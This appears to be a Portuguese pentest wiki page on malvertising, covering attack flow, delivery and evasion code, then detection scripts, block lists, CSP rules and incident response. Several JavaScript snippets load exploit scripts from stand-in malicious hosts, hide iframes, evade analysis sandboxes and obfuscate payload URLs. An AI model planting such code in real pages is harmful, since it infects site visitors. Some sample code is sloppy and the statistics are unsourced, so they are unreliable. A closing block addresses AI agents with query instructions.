# Malvertising

***

## **🔍 Conceitos Fundamentais**

### **O que é Malvertising**

Malvertising (Advertising + Malware) é a prática de injetar anúncios maliciosos em redes legítimas de publicidade para distribuir malware, comprometer sistemas ou engajar em atividades fraudulentas.

### **Características Principais**

```
🎯 **Ameaça Híbrida**: Combina publicidade legítima com payloads maliciosos
🔍 **Stealth**: Difícil detecção, mistura-se com tráfego legítimo
🌐 **Escala**: Afeta milhões de usuários através de sites populares
⚡ **Evolução**: Técnicas em constante atualização
```

### **Estatísticas Impactantes (2024)**

```bash
# Dados do setor
- 1 em cada 100 anúncios contém malware
- 12% dos sites top 100 sofreram com malvertising
- Prejuízo anual: $1.2 bilhões
- Taxa de crescimento: 30% ao ano
```

***

## **🎭 Anatomia do Ataque**

### **Fluxo de Ataque Malvertising**

```mermaid
sequenceDiagram
    participant U as Usuário
    participant P as Publisher Site
    participant A as Ad Network
    participant M as Malvertiser
    participant C as C&C Server

    Note over M: FASE 1: Infiltração
    M->>A: Registra como advertiser legítimo
    A->>A: Aprova creatives maliciosos
    
    Note over U,P: FASE 2: Distribuição
    U->>P: Acessa site legítimo
    P->>A: Solicita anúncio
    A->>U: Serve creative malicioso
    
    Note over U,C: FASE 3: Exploração
    U->>U: Creative executa exploit kit
    U->>C: Download malware
    C->>U: Entrega payload
    U->>U: Infecção do sistema
    
    Note over U,C: FASE 4: Persistência
    U->>C: Estabelece canal C&C
    C->>U: Comandos e controle
```

### **Componentes do Ecossistema**

```javascript
// Estrutura típica de ataque malvertising
const malvertisingAttack = {
    infiltration: {
        method: "Fake advertiser account",
        duration: "Days to weeks",
        bypass: "Social engineering + fake documents"
    },
    delivery: {
        vector: "Compromised ad creative",
        mechanism: "JavaScript obfuscated",
        triggers: ["Page load", "User interaction", "Timer"]
    },
    exploitation: {
        kit: "Angler/EK/RIG",
        targets: ["Browser vulnerabilities", "Plugins", "OS flaws"],
        evasion: ["Polymorphic code", "Geo-targeting", "User-agent filtering"]
    },
    persistence: {
        malware: ["Ransomware", "Banking Trojan", "Botnet"],
        communication: "C&C servers",
        monetization: ["Data theft", "Ransom", "Credential harvesting"]
    }
};
```

***

## **⚔️ Técnicas e Vetores**

### **Técnicas de Entrega**

#### **1. Drive-by Downloads**

```html
<!-- Anúncio comprometido com iframe oculto -->
<div style="position:absolute;left:-1000px;top:-1000px;">
    <iframe src="hxxp://malicious-domain.com/exploit.html" 
            width="1" height="1"></iframe>
</div>

<!-- Ou usando script -->
<script>
    setTimeout(function() {
        var s = document.createElement('script');
        s.src = 'hxxp://malicious-cdn.com/exploit.js';
        document.head.appendChild(s);
    }, 5000);
</script>
```

#### **2. Clickjacking em Anúncios**

```html
<!-- Anúncio legítimo sobreposto por layer transparente -->
<div style="position:relative;">
    <!-- Anúncio real -->
    <div id="legit-ad">
        <img src="legitimate-ad.jpg" style="z-index:1;">
    </div>
    
    <!-- Layer maliciosa transparente -->
    <div style="position:absolute;top:0;left:0;width:100%;height:100%;z-index:2;opacity:0.01;"
         onclick="window.location='hxxp://malicious-site.com'">
    </div>
</div>
```

#### **3. Redirecionamentos Encadeados**

```javascript
// Redirecionamento múltiplo para evadir detecção
function chainRedirect() {
    const redirectChain = [
        'hxxp://legitimate-redirector.com/track?uid=123',
        'hxxp://compromised-cdn.com/landing?ref=abc',
        'hxxp://malicious-gateway.com/exploit?version=2'
    ];
    
    let current = 0;
    function nextRedirect() {
        if (current < redirectChain.length) {
            window.location = redirectChain[current++];
        }
    }
    
    setTimeout(nextRedirect, 100);
}
```

### **Técnicas de Evasão**

#### **1. Detecção de Ambiente**

```javascript
// Verificar se é ambiente de análise
function isAnalysisEnvironment() {
    const checks = {
        screenSize: window.screen.width < 1024 || window.screen.height < 768,
        userAgent: navigator.userAgent.includes('Sandbox') || 
                   navigator.userAgent.includes('Analysis'),
        plugins: navigator.plugins.length === 0,
        performance: performance.memory ? performance.memory.totalJSHeapSize < 10000000 : false,
        debugger: typeof window.console.debug !== 'undefined'
    };
    
    return Object.values(checks).some(check => check === true);
}

// Só executar payload em ambiente real
if (!isAnalysisEnvironment()) {
    deliverMaliciousPayload();
}
```

#### **2. Geo-Targeting e Fingerprinting**

```javascript
// Executar apenas em regiões específicas
function shouldExecute() {
    return new Promise((resolve) => {
        // Verificar timezone
        const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
        const allowedZones = ['America/New_York', 'Europe/London', 'Asia/Tokyo'];
        
        // Verificar IP via serviço externo
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                // Verificar se IP está em lista permitida
                const allowedIPs = ['192.168.1.0/24', '10.0.0.0/8'];
                const isAllowed = allowedIPs.some(range => 
                    isIPInRange(data.ip, range));
                
                resolve(allowedZones.includes(timezone) && isAllowed);
            })
            .catch(() => resolve(false));
    });
}
```

#### **3. Obfuscação de Código**

```javascript
// Código ofuscado para evitar detecção
const _0x1a2b = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x6c\x69\x63\x69\x6f\x75\x73\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64'];
(function(_0x2c3d, _0x3e4f) {
    const _0x5a6b = function(_0x6b7c) {
        while (--_0x6b7c) {
            _0x2c3d['push'](_0x2c3d['shift']());
        }
    };
    _0x5a6b(++_0x3e4f);
}(_0x1a2b, 0x1f4));
const _0x5a6b = function(_0x2c3d, _0x3e4f) {
    _0x2c3d = _0x2c3d - 0x0;
    let _0x5a6b = _0x1a2b[_0x2c3d];
    return _0x5a6b;
};

// Payload real ofuscado
const payloadUrl = _0x5a6b('0x0');
```

***

## **🏢 Cadeia de Fornecimento**

### **Ecossistema de Publicidade Digital**

```mermaid
graph TB
    A[Advertiser] --> B[DSP<br/>Demand Side Platform]
    C[Publisher] --> D[SSP<br/>Supply Side Platform]
    B --> E[Ad Exchange]
    D --> E
    E --> F[Ad Network]
    F --> G[User Browser]
    
    H[Malvertiser] --> B
    H --> F
    I[Compromised<br/>Ad Creative] --> G
    J[Exploit Kit] --> I
```

### **Pontos de Injeção**

```python
# Simulação de cadeia de fornecimento vulnerável
class AdSupplyChain:
    def __init__(self):
        self.entities = {
            'advertisers': [],
            'publishers': [],
            'networks': [],
            'exchanges': []
        }
        self.vulnerability_points = []
    
    def identify_injection_points(self):
        """Identificar pontos vulneráveis na cadeia"""
        injection_points = [
            {
                'point': 'Advertiser Onboarding',
                'risk': 'HIGH',
                'description': 'Verificação inadequada de novos anunciantes',
                'exploitation': 'Malvertiser se passa por anunciante legítimo'
            },
            {
                'point': 'Creative Review',
                'risk': 'HIGH', 
                'description': 'Análise automatizada insuficiente de creatives',
                'exploitation': 'Upload de creative malicioso ofuscado'
            },
            {
                'point': 'Ad Serving',
                'risk': 'MEDIUM',
                'description': 'Falta de sanitização no ad server',
                'exploitation': 'Injeção de código durante o serving'
            },
            {
                'point': 'Third-Party Tags',
                'risk': 'CRITICAL',
                'description': 'Tags de terceiros não verificados',
                'exploitation': 'Cadeia de redirecionamento maliciosa'
            }
        ]
        
        return injection_points
    
    def simulate_attack_chain(self):
        """Simular cadeia de ataque completa"""
        attack_chain = {
            'phase_1': {
                'action': 'Establish fake advertiser account',
                'method': 'Social engineering + fake documents',
                'duration': '2-3 weeks'
            },
            'phase_2': {
                'action': 'Upload malicious creative',
                'method': 'Obfuscated JavaScript + legitimate-looking banner',
                'evasion': 'Polymorphic code + environment detection'
            },
            'phase_3': {
                'action': 'Bid on premium inventory',
                'method': 'Target high-traffic publisher sites',
                'targeting': 'Geo-specific + user-agent filtering'
            },
            'phase_4': {
                'action': 'Execute exploit chain',
                'method': 'Drive-by download + privilege escalation',
                'payload': 'Ransomware/Banking Trojan/Botnet'
            }
        }
        
        return attack_chain
```

### **Vetores de Comprometimento**

#### **1. Comprometimento de Third-Party Scripts**

```html
<!-- Script legítimo de analytics comprometido -->
<script src="https://legitimate-analytics.com/track.js"></script>

<!-- Após comprometimento, o script serve conteúdo malicioso -->
<script>
// Código legítimo de tracking
window.trackPageView = function() { /* ... */ };

// Código malicioso injetado
if (Math.random() < 0.01) { // 1% dos usuários
    setTimeout(function() {
        var s = document.createElement('script');
        s.src = 'https://malicious-cdn.com/exploit.js';
        document.head.appendChild(s);
    }, 10000);
}
</script>
```

#### **2. Ataques à Cadeia de Fornecimento**

```javascript
// Comprometimento de CDN de publicidade
class CompromisedAdSDK {
    constructor() {
        this.legitimateFunctionality();
        this.maliciousPayload();
    }
    
    legitimateFunctionality() {
        // Funcionalidades normais do SDK
        this.loadAd();
        this.trackImpression();
        this.handleClick();
    }
    
    maliciousPayload() {
        // Payload malicioso escondido
        if (this.shouldExecuteMaliciousCode()) {
            this.deliverExploit();
        }
    }
    
    shouldExecuteMaliciousCode() {
        // Lógica para evitar detecção
        const blacklistedDomains = ['analytics.company.com', 'sandbox.example.com'];
        const currentDomain = window.location.hostname;
        
        return !blacklistedDomains.includes(currentDomain) && 
               !this.isAnalysisEnvironment();
    }
    
    deliverExploit() {
        // Entrega do exploit
        const exploitUrl = this.generateDynamicUrl();
        this.loadExploit(exploitUrl);
    }
}
```

***

## **🔍 Detecção e Análise**

### **Sinais de Malvertising**

#### **1. Indicadores Comportamentais**

```javascript
// Monitor para detectar comportamentos suspeitos
class MalvertisingDetector {
    constructor() {
        this.suspiciousBehaviors = [];
        this.startMonitoring();
    }
    
    startMonitoring() {
        // Monitorar criação de elementos suspeitos
        this.monitorElementCreation();
        
        // Monitorar requisições de rede
        this.monitorNetworkRequests();
        
        // Monitorar comportamentos anômalos
        this.monitorAnomalousBehaviors();
    }
    
    monitorElementCreation() {
        const originalCreateElement = document.createElement;
        document.createElement = function(tagName) {
            const element = originalCreateElement.call(this, tagName);
            
            if (tagName.toLowerCase() === 'iframe' || 
                tagName.toLowerCase() === 'script') {
                console.warn('Suspicious element creation:', tagName);
                MalvertisingDetector.analyzeElement(element);
            }
            
            return element;
        };
    }
    
    monitorNetworkRequests() {
        const originalFetch = window.fetch;
        window.fetch = function(...args) {
            const url = args[0];
            
            if (MalvertisingDetector.isSuspiciousUrl(url)) {
                console.warn('Suspicious fetch request:', url);
                MalvertisingDetector.blockRequest(args);
                return Promise.reject(new Error('Blocked by malvertising detector'));
            }
            
            return originalFetch.apply(this, args);
        };
    }
    
    static isSuspiciousUrl(url) {
        const suspiciousPatterns = [
            /\/exploit\./i,
            /\/payload\./i,
            /\/cryptominer\./i,
            /\/redirect\?/i,
            /\/gateway\./i
        ];
        
        return suspiciousPatterns.some(pattern => pattern.test(url));
    }
}
```

#### **2. Análise de Tráfego de Rede**

```python
#!/usr/bin/env python3
# malvertising_analyzer.py

import pyshark
import re
from urllib.parse import urlparse
import json

class NetworkTrafficAnalyzer:
    def __init__(self, interface='eth0'):
        self.interface = interface
        self.suspicious_patterns = self.load_malvertising_patterns()
        
    def load_malvertising_patterns(self):
        """Carregar padrões conhecidos de malvertising"""
        return {
            'domains': [
                r'cdn\d+\.\w+\.\w+',  # CDNs suspeitos
                r'\w+gateway\w+\.\w+', # Gateways
                r'\w+exploit\w+\.\w+', # Exploit domains
                r'\d+\.\d+\.\d+\.\d+', # IPs diretos
            ],
            'urls': [
                r'/payload\.',
                r'/exploit\.',
                r'/cryptojacking\.',
                r'/redirect\.php',
                r'/gateway\.asp'
            ],
            'user_agents': [
                r'Malware',
                r'Botnet',
                r'Exploit'
            ]
        }
    
    def analyze_packet(self, packet):
        """Analisar pacote individual"""
        try:
            if hasattr(packet, 'http'):
                http_layer = packet.http
                
                analysis_result = {
                    'suspicious': False,
                    'indicators': [],
                    'risk_score': 0
                }
                
                # Analisar host
                if hasattr(http_layer, 'host'):
                    host = http_layer.host
                    if self.is_suspicious_domain(host):
                        analysis_result['suspicious'] = True
                        analysis_result['indicators'].append(f'Suspicious domain: {host}')
                        analysis_result['risk_score'] += 30
                
                # Analisar URI
                if hasattr(http_layer, 'request_uri'):
                    uri = http_layer.request_uri
                    if self.is_suspicious_uri(uri):
                        analysis_result['suspicious'] = True
                        analysis_result['indicators'].append(f'Suspicious URI: {uri}')
                        analysis_result['risk_score'] += 25
                
                # Analisar user-agent
                if hasattr(http_layer, 'user_agent'):
                    user_agent = http_layer.user_agent
                    if self.is_suspicious_user_agent(user_agent):
                        analysis_result['suspicious'] = True
                        analysis_result['indicators'].append(f'Suspicious User-Agent: {user_agent}')
                        analysis_result['risk_score'] += 20
                
                return analysis_result
                
        except AttributeError:
            pass
        
        return None
    
    def start_capture(self, duration=60):
        """Iniciar captura de tráfego"""
        capture = pyshark.LiveCapture(interface=self.interface)
        
        print(f"Starting malvertising analysis for {duration} seconds...")
        
        for packet in capture.sniff_continuously():
            result = self.analyze_packet(packet)
            
            if result and result['suspicious']:
                print(f"🚨 SUSPICIOUS TRAFFIC DETECTED")
                print(f"Risk Score: {result['risk_score']}")
                print(f"Indicators: {result['indicators']}")
                print("-" * 50)

# Uso do analisador
if __name__ == "__main__":
    analyzer = NetworkTrafficAnalyzer()
    analyzer.start_capture(duration=300)
```

### **Ferramentas de Detecção**

#### **1. Scanner de Anúncios**

```javascript
// Content Security Policy para bloquear malvertising
const cspPolicy = `
    default-src 'self';
    script-src 'self' 'unsafe-inline' https://trusted-cdn.com;
    style-src 'self' 'unsafe-inline' https://trusted-css.com;
    img-src 'self' https://trusted-images.com;
    frame-src 'none';
    object-src 'none';
    base-uri 'self';
    require-trusted-types-for 'script';
`.replace(/\n/g, ' ').trim();

// Injetar CSP no header
const meta = document.createElement('meta');
meta.httpEquiv = 'Content-Security-Policy';
meta.content = cspPolicy;
document.head.appendChild(meta);
```

#### **2. Browser Extensions para Detecção**

```javascript
// Exemplo de extensão para detecção de malvertising
class MalvertisingBlocker {
    constructor() {
        this.blockedUrls = new Set();
        this.suspiciousPatterns = this.loadPatterns();
        this.init();
    }
    
    loadPatterns() {
        return [
            // Domains conhecidos de malvertising
            /malicious-ads\.com/,
            /exploit-kit\./,
            /\d+\.\d+\.\d+\.\d+\/payload/,
            
            // Padrões de URL suspeitos
            /\/redirect\?url=/,
            /\/gateway\?token=/,
            /\/exploit\.js$/
        ];
    }
    
    init() {
        // Interceptar requisições
        chrome.webRequest.onBeforeRequest.addListener(
            (details) => {
                if (this.isSuspiciousUrl(details.url)) {
                    this.blockedUrls.add(details.url);
                    return { cancel: true };
                }
            },
            { urls: ["<all_urls>"] },
            ["blocking"]
        );
        
        // Monitorar criação de iframes
        this.monitorIframes();
    }
    
    isSuspiciousUrl(url) {
        return this.suspiciousPatterns.some(pattern => pattern.test(url));
    }
    
    monitorIframes() {
        const observer = new MutationObserver((mutations) => {
            mutations.forEach((mutation) => {
                mutation.addedNodes.forEach((node) => {
                    if (node.tagName === 'IFRAME' && node.src) {
                        if (this.isSuspiciousUrl(node.src)) {
                            node.remove();
                            this.reportIncident('suspicious_iframe', node.src);
                        }
                    }
                });
            });
        });
        
        observer.observe(document.body, {
            childList: true,
            subtree: true
        });
    }
}
```

***

## **🛡️ Mitigação e Prevenção**

### **Estratégias de Defesa em Camadas**

#### **1. Hardening do Browser**

```javascript
// Configurações de segurança para mitigar malvertising
const browserHardening = {
    contentSecurityPolicy: {
        enabled: true,
        policy: "default-src 'self'; script-src 'self'",
        reportOnly: false
    },
    iframeSandboxing: {
        enabled: true,
        attributes: "sandbox='allow-scripts allow-same-origin'"
    },
    clickjackingProtection: {
        xFrameOptions: "SAMEORIGIN",
        frameAncestors: "'self'"
    },
    networkRestrictions: {
        blockKnownMaliciousIPs: true,
        restrictThirdPartyCookies: true,
        enableSafeBrowsing: true
    }
};

// Implementação prática
function implementBrowserProtections() {
    // CSP Header
    const cspMeta = document.createElement('meta');
    cspMeta.httpEquiv = 'Content-Security-Policy';
    cspMeta.content = "default-src 'self'; script-src 'self'";
    document.head.appendChild(cspMeta);
    
    // Sandbox iframes existentes
    document.querySelectorAll('iframe').forEach(iframe => {
        iframe.setAttribute('sandbox', 'allow-scripts allow-same-origin');
    });
}
```

#### **2. Ad Blocker Empresarial**

```python
#!/usr/bin/env python3
# enterprise_ad_blocker.py

import re
import json
from datetime import datetime

class EnterpriseAdBlocker:
    def __init__(self):
        self.malvertising_domains = self.load_threat_intelligence()
        self.suspicious_patterns = self.load_patterns()
        self.block_log = []
    
    def load_threat_intelligence(self):
        """Carregar feeds de inteligência de ameaças"""
        # Em produção, isso viria de APIs como:
        # - Abuse.ch
        # - Malware Domain List
        # - Threat Intelligence Feeds
        return {
            'domains': [
                'malicious-ads.com',
                'exploit-kit.net',
                'compromised-cdn.org'
            ],
            'ips': [
                '192.168.99.100',
                '10.10.10.200'
            ],
            'patterns': [
                r'\/payload\.',
                r'\/exploit\.',
                r'\/crypto\-miner\.'
            ]
        }
    
    def should_block_request(self, url, referer, user_agent):
        """Decidir se deve bloquear a requisição"""
        block_reasons = []
        
        # Verificar domínio na blacklist
        domain = self.extract_domain(url)
        if domain in self.malvertising_domains['domains']:
            block_reasons.append('Blacklisted domain')
        
        # Verificar padrões suspeitos na URL
        for pattern in self.malvertising_domains['patterns']:
            if re.search(pattern, url, re.IGNORECASE):
                block_reasons.append('Suspicious URL pattern')
                break
        
        # Verificar referer suspeito
        if self.is_suspicious_referer(referer):
            block_reasons.append('Suspicious referer')
        
        # Análise heurística
        heuristic_score = self.heuristic_analysis(url, user_agent)
        if heuristic_score > 70:  # Threshold
            block_reasons.append('High heuristic risk score')
        
        return len(block_reasons) > 0, block_reasons
    
    def heuristic_analysis(self, url, user_agent):
        """Análise heurística para detecção proativa"""
        score = 0
        
        # URL muito longa ou complexa
        if len(url) > 200:
            score += 20
        
        # Muitos parâmetros
        if url.count('?') > 3 or url.count('&') > 10:
            score += 15
        
        # Encodings suspeitos
        if '%' in url and url.count('%') > 5:
            score += 15
        
        # User-Agent anômalo
        if not user_agent or user_agent == '':
            score += 10
        
        return score
    
    def log_blocked_request(self, url, reasons):
        """Registrar requisição bloqueada"""
        log_entry = {
            'timestamp': datetime.now().isoformat(),
            'url': url,
            'reasons': reasons,
            'action': 'BLOCKED'
        }
        
        self.block_log.append(log_entry)
        print(f"🚫 BLOCKED: {url}")
        print(f"   Reasons: {', '.join(reasons)}")

# Uso em proxy corporativo
blocker = EnterpriseAdBlocker()
```

#### **3. Secure Ad Serving**

```javascript
// Framework seguro para servir anúncios
class SecureAdServer {
    constructor() {
        this.allowedDomains = this.loadAllowedDomains();
        this.sandboxAttributes = 'sandbox="allow-scripts allow-same-origin"';
    }
    
    loadAllowedDomains() {
        return [
            'https://trusted-ad-network.com',
            'https://verified-advertiser.com',
            'https://secure-ad-cdn.com'
        ];
    }
    
    createSecureAdContainer(adContent) {
        const container = document.createElement('div');
        container.className = 'secure-ad-container';
        
        // Aplicar estilos de contenção
        Object.assign(container.style, {
            position: 'relative',
            overflow: 'hidden',
            maxWidth: '100%'
        });
        
        // Sanitizar conteúdo do anúncio
        const sanitizedContent = this.sanitizeAdContent(adContent);
        container.innerHTML = sanitizedContent;
        
        // Aplicar sandboxing a iframes
        this.sandboxFrames(container);
        
        return container;
    }
    
    sanitizeAdContent(content) {
        // Remover scripts maliciosos
        content = content.replace(/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi, '');
        
        // Remover event handlers perigosos
        const dangerousAttributes = [
            'onload', 'onerror', 'onclick', 'onmouseover',
            'onfocus', 'onblur', 'onkeypress'
        ];
        
        dangerousAttributes.forEach(attr => {
            const regex = new RegExp(`\\s${attr}=["'][^"']*["']`, 'gi');
            content = content.replace(regex, '');
        });
        
        return content;
    }
    
    sandboxFrames(container) {
        const iframes = container.getElementsByTagName('iframe');
        Array.from(iframes).forEach(iframe => {
            iframe.setAttribute('sandbox', this.sandboxAttributes);
            iframe.setAttribute('referrerpolicy', 'no-referrer');
        });
    }
}
```

### **Melhores Práticas para Publishers**

#### **1. Políticas de Aceitação de Anúncios**

```yaml
# ad_acceptance_policy.yaml
ad_acceptance_policy:
  verification_requirements:
    advertiser_verification: "required"
    business_registration: "required"
    contact_verification: "required"
  
  content_restrictions:
    allowed_formats: ["static_image", "gif", "html5"]
    max_file_size: "500KB"
    prohibited_content:
      - "auto_redirects"
      - "pop_unders"
      - "auto_play_audio"
      - "excessive_animation"
  
  technical_requirements:
    ssl_required: true
    third_party_scripts: "restricted"
    dom_manipulation: "prohibited"
    external_requests: "monitored"
  
  monitoring:
    real_time_scanning: true
    behavioral_analysis: true
    user_feedback_loop: true
```

#### **2. Implementação de Header de Segurança**

```nginx
# Configuração Nginx para proteção contra malvertising
server {
    listen 443 ssl;
    server_name example.com;
    
    # Headers de segurança
    add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted-cdn.com; frame-src 'none'; object-src 'none'";
    add_header X-Frame-Options "SAMEORIGIN";
    add_header X-Content-Type-Options "nosniff";
    add_header Referrer-Policy "strict-origin-when-cross-origin";
    
    # Bloquear user-agents suspeitos
    if ($http_user_agent ~* (malware|botnet|exploit)) {
        return 444;
    }
    
    # Rate limiting para ad endpoints
    location /ads/ {
        limit_req zone=ad_requests burst=10 nodelay;
        proxy_pass http://ad_server;
    }
}
```

***

## **🚨 Resposta a Incidentes**

### **Plano de Resposta a Malvertising**

#### **1. Detecção e Triagem**

```python
# incident_response_automation.py

class MalvertisingIncidentResponse:
    def __init__(self):
        self.incident_log = []
        self.containment_actions = []
    
    def detect_incident(self, evidence):
        """Detectar incidente de malvertising"""
        incident = {
            'id': self.generate_incident_id(),
            'timestamp': datetime.now().isoformat(),
            'severity': self.assess_severity(evidence),
            'evidence': evidence,
            'status': 'investigating'
        }
        
        self.incident_log.append(incident)
        return incident
    
    def contain_incident(self, incident_id):
        """Conter o incidente"""
        incident = self.get_incident(incident_id)
        
        containment_actions = [
            self.block_malicious_domains(incident['evidence']['domains']),
            self.remove_compromised_ads(incident['evidence']['ad_ids']),
            self.notify_publishers(incident['evidence']['publisher_sites']),
            self.update_blocklists(incident['evidence']['indicators'])
        ]
        
        self.containment_actions.extend(containment_actions)
        self.update_incident_status(incident_id, 'contained')
    
    def eradicate_threat(self, incident_id):
        """Eradicar a ameaça"""
        incident = self.get_incident(incident_id)
        
        eradication_actions = [
            self.revoke_advertiser_access(incident['evidence']['advertiser_id']),
            self.clean_infected_systems(incident['evidence']['compromised_assets']),
            self.enhance_detection_rules(incident['evidence']['tactics']),
            self.security_awareness_training(incident['evidence']['attack_vector'])
        ]
        
        self.update_incident_status(incident_id, 'eradicated')
    
    def generate_report(self, incident_id):
        """Gerar relatório pós-incidente"""
        incident = self.get_incident(incident_id)
        
        report = {
            'executive_summary': self.generate_executive_summary(incident),
            'technical_analysis': self.generate_technical_analysis(incident),
            'impact_assessment': self.assess_business_impact(incident),
            'lessons_learned': self.extract_lessons_learned(incident),
            'improvement_plan': self.create_improvement_plan(incident)
        }
        
        return report
```

#### **2. Comunicação e Relatórios**

```yaml
# incident_communication_plan.yaml
communication_plan:
  stakeholders:
    internal:
      - "security_team"
      - "ad_operations"
      - "legal_department"
      - "executive_leadership"
    
    external:
      - "affected_publishers"
      - "law_enforcement"
      - "cybersecurity_authorities"
      - "threat_intelligence_sharing_groups"
  
  notification_timeline:
    immediate: 
      - "security_team"
      - "ad_operations"
    
    within_1_hour:
      - "executive_leadership"
      - "legal_department"
    
    within_4_hours:
      - "affected_publishers"
      - "cybersecurity_authorities"
  
  communication_templates:
    internal_alert: "templates/internal_alert.md"
    publisher_notification: "templates/publisher_notification.md"
    public_statement: "templates/public_statement.md"
```

### **Ferramentas de Análise Forense**

#### **1. Malware Analysis Sandbox**

```python
#!/usr/bin/env python3
# ad_malware_sandbox.py

import subprocess
import json
import time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

class AdMalwareSandbox:
    def __init__(self):
        self.setup_sandbox_environment()
        self.analysis_results = []
    
    def setup_sandbox_environment(self):
        """Configurar ambiente sandbox seguro"""
        chrome_options = Options()
        
        # Configurações de segurança
        chrome_options.add_argument('--no-sandbox')
        chrome_options.add_argument('--disable-dev-shm-usage')
        chrome_options.add_argument('--disable-web-security')
        chrome_options.add_argument('--disable-features=VizDisplayCompositor')
        
        # Configurações de privacidade
        chrome_options.add_argument('--incognito')
        chrome_options.add_argument('--disable-plugins')
        chrome_options.add_argument('--disable-java')
        
        self.driver = webdriver.Chrome(options=chrome_options)
    
    def analyze_ad_url(self, url):
        """Analisar URL de anúncio suspeito"""
        analysis_result = {
            'url': url,
            'timestamp': time.time(),
            'network_requests': [],
            'dom_changes': [],
            'javascript_execution': [],
            'malicious_indicators': []
        }
        
        try:
            # Navegar para a URL
            self.driver.get(url)
            time.sleep(5)  # Aguardar carregamento
            
            # Coletar métricas
            analysis_result['network_requests'] = self.get_network_requests()
            analysis_result['dom_changes'] = self.get_dom_changes()
            analysis_result['javascript_execution'] = self.get_js_execution()
            analysis_result['malicious_indicators'] = self.detect_malicious_behavior()
            
        except Exception as e:
            analysis_result['error'] = str(e)
        
        self.analysis_results.append(analysis_result)
        return analysis_result
    
    def detect_malicious_behavior(self):
        """Detectar comportamentos maliciosos"""
        indicators = []
        
        # Verificar redirecionamentos suspeitos
        if self.driver.current_url != self.initial_url:
            indicators.append('Suspicious redirect')
        
        # Verificar iframes ocultos
        hidden_iframes = self.driver.execute_script("""
            return Array.from(document.querySelectorAll('iframe'))
                .filter(iframe => iframe.offsetParent === null)
                .map(iframe => iframe.src);
        """)
        
        if hidden_iframes:
            indicators.append(f'Hidden iframes: {hidden_iframes}')
        
        # Verificar scripts suspeitos
        suspicious_scripts = self.driver.execute_script("""
            return Array.from(document.scripts)
                .filter(script => script.src.includes('exploit') || 
                                  script.src.includes('payload') ||
                                  script.innerText.includes('eval('))
                .map(script => script.src || 'inline');
        """)
        
        if suspicious_scripts:
            indicators.append(f'Suspicious scripts: {suspicious_scripts}')
        
        return indicators
```

***

## **📊 Métricas e Monitoramento**

### **KPIs de Segurança para Malvertising**

```python
# security_metrics_dashboard.py

class MalvertisingMetrics:
    def __init__(self):
        self.metrics = {
            'prevention': {},
            'detection': {},
            'response': {}
        }
    
    def calculate_prevention_metrics(self):
        """Calcular métricas de prevenção"""
        return {
            'ad_verification_success_rate': self.calc_verification_rate(),
            'malicious_ad_block_rate': self.calc_block_rate(),
            'false_positive_rate': self.calc_false_positive_rate(),
            'policy_compliance_rate': self.calc_compliance_rate()
        }
    
    def calculate_detection_metrics(self):
        """Calcular métricas de detecção"""
        return {
            'mean_time_to_detect': self.calc_mttd(),
            'detection_accuracy': self.calc_detection_accuracy(),
            'threat_intelligence_coverage': self.calc_ti_coverage(),
            'behavioral_analysis_effectiveness': self.calc_behavioral_effectiveness()
        }
    
    def calculate_response_metrics(self):
        """Calcular métricas de resposta"""
        return {
            'mean_time_to_respond': self.calc_mttr(),
            'incident_containment_rate': self.calc_containment_rate(),
            'recovery_time_objective': self.calc_rto(),
            'customer_impact_score': self.calc_impact_score()
        }
    
    def generate_security_dashboard(self):
        """Gerar dashboard de segurança"""
        dashboard = {
            'overall_risk_score': self.calculate_overall_risk(),
            'prevention_metrics': self.calculate_prevention_metrics(),
            'detection_metrics': self.calculate_detection_metrics(),
            'response_metrics': self.calculate_response_metrics(),
            'trend_analysis': self.analyze_trends(),
            'recommendations': self.generate_recommendations()
        }
        
        return dashboard
```

***

## **⚠️ Considerações Finais**

### **Tendências Emergentes (2024)**

```yaml
emerging_trends:
  ai_powered_attacks:
    - "GAN-generated ad creatives"
    - "ML-based evasion techniques"
    - "Adaptive payload delivery"
  
  supply_chain_attacks:
    - "Compromised ad tech libraries"
    - "Third-party SDK backdoors"
    - "Open-source ad components"
  
  mobile_focus:
    - "In-app advertising exploits"
    - "Mobile-specific malware"
    - "App store malvertising"
  
  sophisticated_evasion:
    - "Polymorphic JavaScript"
    - "Behavioral triggering"
    - "Geo-temporal targeting"
```

### **Recomendações Estratégicas**

1. **Defesa em Profundidade**: Múltiplas camadas de proteção
2. **Monitoramento Contínuo**: Detecção em tempo real
3. **Inteligência de Ameaças**: Feeds atualizados
4. **Educação do Usuário**: Conscientização sobre segurança
5. **Resposta a Incidentes**: Planos testados regularmente

### **Recursos Recomendados**

* **IAB Tech Lab**: Guias de segurança para publicidade
* **OWASP**: Segurança em aplicações web
* **CISA**: Alertas de segurança
* **MITRE ATT\&CK**: Táticas e técnicas

**🔐 Lembre-se**: Malvertising é uma ameaça evolutiva que requer abordagem proativa. A combinação de defesas técnicas, processos robustos e educação contínua é essencial para proteção eficaz.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/front-end/malvertising.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.